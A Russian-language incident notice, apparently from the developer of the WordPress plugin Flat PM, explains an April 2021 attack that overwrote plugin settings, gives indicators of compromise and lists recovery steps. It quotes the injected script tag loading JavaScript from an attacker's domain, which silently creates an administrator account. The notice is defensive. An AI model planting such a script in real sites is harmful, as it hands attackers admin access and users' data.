Шёл второй день после атаки

Шёл второй день после атаки

Всем привет! Хочу собрать всю информацию об атаке в одном месте, чтобы люди могли её прочесть и понять, что же случилось и как им быть.

Предыстория

Атака началась вчера (12.04.21), автоматическая, самое раннее обращение (остановился счётчик метрики) в 19:00 по МСК. Атакованы оказались не все сайты, а лишь те, которые смог собрать злоумышленник в своей базе. Скрипт хакера нашёл уязвимость, благодаря которой смог перезаписать настройки в плагине. Воображения хватило на то, чтобы записать вредоносную строчку:

<script type='text/javascript' src='https://wpctrl.tk/ds.js'></script>

Эта строка выводится только на фронте сайта, т.е. в админке её нет! Сама строка имеет код, который отправляет запрос на файл вордпресса /wp-admin/user-new.php. Всё бы ничего, но если этот запрос будет инициализирован с браузера администратора, то файл действительно создаст нового пользователя. После успешного создания нового пользователя с админ. правами скрипт отправляет уведомление атакующему.

Спасибо Александру Букрееву, что выяснил дальнейшее поведение хакера!

Хакер в ручном режиме логинился на сайт-жертву под новым пользователем администратора. Дальше он устанавливал плагин, собирающий конфиденциальную информацию из базы данных о пользователях сайта и их активности, в т.ч. логины, хэши паролей и т.д.

Как определить, что вас взломали

Нужно проверить настройки плагина Flat PM в разделе Header и footer.

Шёл второй день после атаки
Вы увидите, что все ваши настройки затёрты, а в поле head вставлена строка с подключением вредоносного js файла

Далее вам нужно проверить пользователей вашего сайта, появился ли новый аккаунт с правами администратора. У него может быть почта system@wordpress.local.

Если у вас всё же появился такой пользователь, то следует проверить ваши плагины. Хакер устанавливал плагин, который видно только в файловой системе, в админке он не отображается.

/wp-content/plugins/wp-xmlrpc-disable/

Проверьте папку с плагинами на наличие новой папки с названием wp-xmlrpc-disable.

Как нужно поступить

Во-первых, вам нужно понять, как далеко зашёл хакер.

  1. Если вы нашли у себя новый плагин wp-xmlrpc-disable, то в вашем случае нужно обязательно сделать следующее:
    1. Восстановить бекап сайта за 12.04.21 15:00 по МСК или ранее, нужен будет полный бекап файлов и базы данных.
    2. После восстановления обязательно обновите плагин Flat PM до новой версии 2.654.
    3. Обязательно смените пароли у всех администраторов на вашем сайте.
  2. Если плагина вы не обнаружили, но пользователь всё же создан, рекомендую сделать всё как в первом пункте. Если вы не хотите или не можете восстановить бекап, то вам необходимо:
    1. Удалить нового пользователя.
    2. Удалить вредоносную строчку из настроек плагина “Header и footer”.
    3. Обновить плагин до версии 2.654.
    4. Обязательно сменить все пароли к пользователям со статусом “администратор”.
    5. Сбросить всевозможные кеши, это касается всех плагинов кеширования и кеша в вашем браузере.
      Если вредоносный скрипт закешировался у вас в браузере, то вы вновь создадите пользователя с админ. правами для злоумышленника.
  3. Если вы обнаружили только строчку в разделе “Header и footer”, вам нужно:
    1. Удалить вредоносную строку из настроек плагина.
    2. Обновить плагин до версии 2.654.
    3. Обязательно сменить все пароли к пользователям со статусом “администратор”.
    4. Сбросить всевозможные кеши, это касается всех плагинов кеширования и кеша в вашем браузере.
      Если вредоносный скрипт закешировался у вас в браузере, то вы вновь создадите пользователя с админ. правами для злоумышленника.

Во-вторых, я на этом настаиваю, через 1-2 дня проверьте ваши сайты вновь, не появилось ли повторных случаев регистрации нового пользователя. Если всё будет окей, значит вы сделали всё правильно и защитили свой сайт!

Советы

Есть случаи, когда по разным причинам пользователи не могут обновить Flat PM до последней версии 2.654, тогда вам следует удалить плагин и установить его заново, скачать его можно с официального репозитория в wordpress.

Я понимаю, что есть люди, у которых стоит очень старая версия плагина 1.х+.
Вам ничего не грозит, такой уязвимости в той версии нет. Уязвимость появилась лишь на версиях 2.х+.

check

Я искренне прошу прощения за все неудобства, которые возникли у большого количества людей!

Мне жаль, что так произошло. Я очень много времени потратил и потрачу ещё, чтобы сделать ещё более полезный и безопасный инструмент для монетизации и вывода интерактива на сайтах.

С уважением, Михаил Flat.

Комментарии

Adblock
detector